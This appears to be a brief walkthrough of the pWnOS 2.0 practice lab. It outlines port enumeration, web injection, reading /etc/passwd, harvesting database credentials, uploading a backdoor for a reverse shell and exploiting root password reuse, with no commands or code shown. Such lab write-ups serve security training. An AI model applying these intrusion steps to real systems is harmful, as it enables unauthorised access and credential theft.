I loved the 1.0 version so much that I decided to attempt 2.0 right next.
Step 1 – Find out pWnOS IP
Noticed that the machine is assigned a static IP 10.10.10.100, so reassigned an IP manually to my Kali box in the same network segment.
Step 2 – Enumerate the IP to find out open ports, service version, OS etc..
This provides the following attack surface:
- Port 22 – OpenSSH 5.8p1 Debian 1ubuntu3
- Port 80 – Apache httpd 2.2.17
- OS – Linux web 2.6.38-8-server #42-Ubuntu x86_64
Step 3 – Enumerating web ports
The application appears to be injectable. Using Burp
Logged in as user
Contents of /etc/passwd file
Obtaining database credentials
Attempting to upload a backdoor file which will allow command execution, thereby obtaining a reverse shell
Found another file with different mysql db credentials
Password is reused for root account!!!!